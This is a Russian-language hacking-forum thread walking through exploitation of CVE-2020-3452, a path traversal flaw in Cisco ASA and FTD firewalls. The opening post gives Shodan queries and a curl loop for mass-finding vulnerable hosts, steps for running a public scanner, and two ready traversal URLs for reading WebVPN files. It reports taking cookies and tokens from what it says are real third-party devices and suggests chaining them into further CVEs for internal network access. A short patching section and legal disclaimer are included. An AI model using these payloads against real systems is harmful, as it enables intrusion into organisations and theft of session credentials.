HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.08.2020, 05:02
Vertigo
Познавший АНТИЧАТ
Регистрация: 27.02.2017
Сообщений: 1,312
С нами: 4845950

Репутация: 0


По умолчанию



Приветствую Друзей,Уважаемых Форумчан и Читателей Форума.
Сегодня поговорим немного о нашумевшей уязвимости в Cisco
Оперативно искать решение проблемы IT-компании заставил Михаил Ключников.
Эксперт из Positive Technologies не впервые находит опасные уязвимости.

Данная уязвимость касается межсетевого экрана Cisco ASA.
И получив идентификатор CVE-2020-3452,она имеет высокий уровень опасности.
Если на устройстве проигнорирована проверка вводных данных,
то атакующий получает доступ к файловой системе и может читать файлы конфигурации WebVPN.

Компания Cisco срочно выпустила патч,но как всегда не все читают новости.
И по-традиции покажу как эксплуатируется такая уязвимость на реальном примере.

Администрация Форума и автор обзора напоминают о соблюдении законодательства.

Запрещено применение рассматриваемых методик атак в незаконных целях.

Информация предоставлена исключительно в рамках ознакомления и изучения проблем безопасности.

Для нахождения уязвимых целей воспользуемся поисковиком shodan.
Интерес представляют следующие версии:
Cisco ASA:9.7 ;9.8 ;9.9 ;9.10 ;9.12 ;9.13 ;9.14
Cisco FTD:6.2.2; 6.2.3 ;6.3.0 ;6.4.0 ;6.5.0 ;6.6.0

Запросы для поисковика:
+CSCOT+ ;+CSCOCA+ ;+CSCOL+ ;+CSCOU+ и +CSCOE+
Если имеется готовый api-key для shodan,то можно его вставить в этот скрипт.
И выполнить поиск из терминала:

Код:


Код:
# shodan search Cisco ASA --fields ip_str --separator " " | awk '{print $1}' | while read host do ; do curl -s -k  "https://$host/+CSCOT+/translation-tab..." ; done
Проверка на уязвимость CVE-2020-3452
Очень удобным оказался для этого сканер от PR3R00T из Англии.
Прилагается файл urls.txt ,который чистим и заполняем списком своих целей
Формат заполнения: https://IP-цели,либо https:// сайт и домен
Кто админит Cisco, могут также воспользоваться для проверки своих веб-интерфейсов сканером:

Код:


Код:
# git clone https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner.git
# cd CVE-2020-3452-Cisco-Scanner
# chmod +x scanner.py
# python3 scanner.py urls.txt
Вот нам сканер указывает на непропатченные машины.



Эксплуатация

Работать будем с Burpsuite,но может кому пригодиться и exploit
Вокальные данные у него неплохие,но рассчитан он на совместную работу в терминале с Nmap.
Впрочем,аналогично может обработать целый список хостов.



В Burpsuite используются в основном 2 вида POC для атаки Path Traversal :

Код:


Код:
https:///+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
https:///+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
Запрос при атаке в дальнейшем меняется и вместо portal_inc.lua подставляется:
Таким образом,прочитываем файлы,в которых можно найти конфиденциальную информацию.



Здесь,к примеру,найдены cookie ,token и прочее:



Token можно сразу же применить для раскрутки другой опасной уязвимости CVE-2020-3259
Она позволяет ввалиться во внутреннюю сеть атакуемой организации.
А если цель подвержена ещё и CVE-2020-3187,то можно отключить VPN.
Далеко так заходить конечно не станем.

У другой цели была обнаружена вот такая страница авторизации.



И результат атаки:



Здесь без комментариев:



Просматриваем useralert:



Объёмный файл,в котором конфигурация,описание авторизации и местонахождения файлов с паролями:



Защита

Защитное программное обеспечение от данной уязвимости с описанием здесь
Кроме этого,необходимо проверить конфигурацию с проверкой вводных данных.
Без кропотливой настройки веб-интерфейс может быть по-прежнему уязвим.

Тестируемые ресурсы живы и невридимы,им не причинено ущерба.
Благодарю всех за внимание и до новых встреч.
 
Ответить с цитированием

  #2  
Старый 15.08.2020, 10:36
ROP
Новичок
Регистрация: 27.08.2019
Сообщений: 0
С нами: 3533622

Репутация: 0
По умолчанию

Спасибо вам за статью!
Очень интересно почитать про новые уязвимости. Особенно, если они про Cisco
 
Ответить с цитированием

  #3  
Старый 18.08.2020, 08:48
tanazy
Новичок
Регистрация: 24.08.2019
Сообщений: 0
С нами: 3537791

Репутация: 0
По умолчанию

Спасибо, очень актуально, только закончил обновление FMC и FTD на 6.6.0.1
 
Ответить с цитированием

  #4  
Старый 28.09.2020, 11:05
Vo1t
Новичок
Регистрация: 07.06.2007
Сообщений: 2
С нами: 9961737

Репутация: 0
По умолчанию

Похоже это наиболее полезная статья по данной уязвимости в интернете )
Кто-нибудь разобрался, как это использовать?
Ну можно читать файлы, и что дальше?
Перспективно выглядит вот этот кусок кода

Код:


Код:
function SetSessionData(index,name,value)

   local f1
   f1=io.open("/sessions/"..index.."/session_data","w")
Но что за индекс - непонятно
 
Ответить с цитированием

  #5  
Старый 19.03.2025, 17:22
elliney
Новичок
Регистрация: 15.04.2023
Сообщений: 0
С нами: 1623550

Репутация: 0
По умолчанию

Всем привет!
Администрирую доставшуюся по "профессиональному наследству" Cisco ASA и решил посмотреть про её безопасность. Конечно, наткнулся на данную уязвимость и, о чудо, она в моём случае актуальна.
Но вот вопрос... Хорошо, нехорошие люди могут смотреть некоторые файлы директории webvpn и, как пишут разные источники, компрометировать сессии. Как указал последний до сего дня комментатор в теме, перспективен некий путь до session_data.
Зашёл по ssh на свою ASA и решил посмотреть, какие в принципе есть файлы в директории webvpn и, собственно, есть ли там session_data (сомнительно, ибо GET до него ничего не возвращает). Но, очутившись внутри, вижу только disk0 и ещё пару областей, в которых никакими там portal_inc.lua и прочими из данной статьи и не пахнет. Возможно ли на них выйти через SSH как-то?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.